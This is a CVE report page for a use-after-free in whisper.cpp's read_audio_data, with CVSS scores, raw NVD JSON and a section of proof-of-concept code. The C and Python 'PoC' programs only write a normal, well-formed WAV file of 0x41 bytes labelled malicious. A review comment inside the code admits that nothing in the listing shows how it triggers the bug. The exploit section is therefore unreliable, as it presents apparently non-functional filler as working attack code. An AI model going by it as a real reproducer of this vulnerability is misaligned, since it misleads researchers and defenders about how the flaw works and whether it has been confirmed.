Security Vulnerability Report
CVE-2025-14569 CVSS 5.3 MEDIUM

CVE-2025-14569

Published: 2025-12-12 19:16:02
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was detected in ggml-org whisper.cpp up to 1.8.2. Affected is the function read_audio_data of the file /whisper.cpp/examples/common-whisper.cpp. The manipulation results in use after free. The attack requires a local approach. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

whisper.cpp <= 1.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
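/*
 * CVE-2025-14569 PoC - whisper.cpp use_after_free in read_audio_data
 * Author: Security Researcher
 * Description: Generates a malicious audio file to trigger use after free
 *
 * What the program actually writes: a 16-bit mono PCM WAV at 16000 Hz whose
 * length fields all agree with each other (RIFF size 36 + 44, fmt chunk 16,
 * data chunk 44 followed by exactly 44 bytes of 0x41).
 *
 * NOTE(review): nothing in this listing shows which property of the file
 * would drive read_audio_data into a use after free. Treat the reproduction
 * claim as unverified; confirm against the reproducer referenced by the
 * advisory, with an AddressSanitizer build in a disposable environment.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Field values of the generated file, named so the layout is auditable. */
enum {
    WAV_FMT_SIZE = 16,        /* size of the fmt chunk body */
    WAV_FORMAT_PCM = 1,       /* audio format tag */
    WAV_CHANNELS = 1,
    WAV_SAMPLE_RATE = 16000,
    WAV_BYTE_RATE = 32000,    /* sample rate * channels * 2 bytes */
    WAV_BLOCK_ALIGN = 2,
    WAV_BITS_PER_SAMPLE = 16,
    WAV_DATA_SIZE = 44        /* bytes in the data chunk */
};

/* Write n raw bytes; returns 1 on success, 0 on a short write. */
static int put_bytes(FILE *fp, const void *src, size_t n)
{
    return fwrite(src, 1, n, fp) == n;
}

/*
 * Write a 16-bit value least-significant byte first. RIFF fields are
 * little-endian, so the bytes are laid out explicitly instead of dumping
 * the host representation of a short.
 */
static int put_le16(FILE *fp, uint16_t v)
{
    const unsigned char b[2] = {
        (unsigned char)(v & 0xffu),
        (unsigned char)((v >> 8) & 0xffu)
    };
    return put_bytes(fp, b, sizeof b);
}

/* Write a 32-bit value least-significant byte first (see put_le16). */
static int put_le32(FILE *fp, uint32_t v)
{
    const unsigned char b[4] = {
        (unsigned char)(v & 0xffu),
        (unsigned char)((v >> 8) & 0xffu),
        (unsigned char)((v >> 16) & 0xffu),
        (unsigned char)((v >> 24) & 0xffu)
    };
    return put_bytes(fp, b, sizeof b);
}

/*
 * Write the WAV file described in the file header to `filename`.
 *
 * Returns 1 when every write and the final fclose succeeded, 0 otherwise.
 * A diagnostic goes to stderr on failure; the "created" line is printed
 * only when the file is complete.
 */
static int write_wav_file(const char *filename)
{
    unsigned char payload[WAV_DATA_SIZE];
    FILE *fp = filename ? fopen(filename, "wb") : NULL;
    int ok;

    if (!fp) {
        fprintf(stderr, "Failed to create file\n");
        return 0;
    }

    memset(payload, 0x41, sizeof payload); /* constant fill pattern */

    /* && short-circuits, so nothing more is written after the first failure. */
    ok = put_bytes(fp, "RIFF", 4)
      && put_le32(fp, 36u + WAV_DATA_SIZE)          /* header + data */
      && put_bytes(fp, "WAVEfmt ", 8)
      && put_le32(fp, WAV_FMT_SIZE)
      && put_le16(fp, (uint16_t)WAV_FORMAT_PCM)
      && put_le16(fp, (uint16_t)WAV_CHANNELS)
      && put_le32(fp, WAV_SAMPLE_RATE)
      && put_le32(fp, WAV_BYTE_RATE)
      && put_le16(fp, (uint16_t)WAV_BLOCK_ALIGN)
      && put_le16(fp, (uint16_t)WAV_BITS_PER_SAMPLE)
      && put_bytes(fp, "data", 4)
      && put_le32(fp, WAV_DATA_SIZE)
      && put_bytes(fp, payload, sizeof payload);

    /* fclose flushes buffered data, so its result is part of success. */
    if (fclose(fp) != 0) {
        ok = 0;
    }

    if (!ok) {
        fprintf(stderr, "Failed to write file\n");
        return 0;
    }

    printf("Malicious audio file created: %s\n", filename);
    return 1;
}

/*
 * Create the WAV file at `filename`.
 *
 * Kept as a void entry point; failures are reported on stderr only.
 */
void create_malicious_audio(const char* filename)
{
    (void)write_wav_file(filename);
}

/*
 * Generate "malicious_audio.wav" in the current directory and print the
 * author's follow-up steps. Exits with EXIT_FAILURE, without printing the
 * steps, when the file could not be written.
 */
int main(void)
{
    const char *malicious_file = "malicious_audio.wav";

    if (!write_wav_file(malicious_file)) {
        return EXIT_FAILURE;
    }

    printf("\nTo trigger the vulnerability:\n");
    printf("1. Compile whisper.cpp with the vulnerable code\n");
    printf("2. Run: ./main -f %s\n", malicious_file);
    printf("3. Observe use after free behavior\n");
    return 0;
}

// Alternative Python PoC
/*
import struct

def create_poc_wav(filename):
    with open(filename, 'wb') as f:
        # RIFF header
        f.write(b'RIFF')
        f.write(struct.pack('<I', 36 + 100))  # File size
        f.write(b'WAVE')
        # fmt chunk
        f.write(b'fmt ')
        f.write(struct.pack('<I', 16))     # Chunk size
        f.write(struct.pack('<H', 1))      # Audio format (PCM)
        f.write(struct.pack('<H', 1))      # Num channels
        f.write(struct.pack('<I', 16000))  # Sample rate
        f.write(struct.pack('<I', 32000))  # Byte rate
        f.write(struct.pack('<H', 2))      # Block align
        f.write(struct.pack('<H', 16))     # Bits per sample
        # data chunk - crafted to trigger UAF
        f.write(b'data')
        f.write(struct.pack('<I', 100))
        f.write(b'\x41' * 100)  # Pattern data

create_poc_wav('poc.wav')
print('PoC file created: poc.wav')
*/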

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14569", "sourceIdentifier": "[email protected]", "published": "2025-12-12T19:16:01.610", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in ggml-org whisper.cpp up to 1.8.2. Affected is the function read_audio_data of the file /whisper.cpp/examples/common-whisper.cpp. The manipulation results in use after free. The attack requires a local approach. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": 
"NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-416"}]}], "references": [{"url": "https://github.com/ggml-org/whisper.cpp/issues/3501", "source": "[email protected]"}, {"url": "https://github.com/oneafter/InvalidFree/blob/main/repro", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.336193", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.336193", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.703886", "source": "[email protected]"}]}}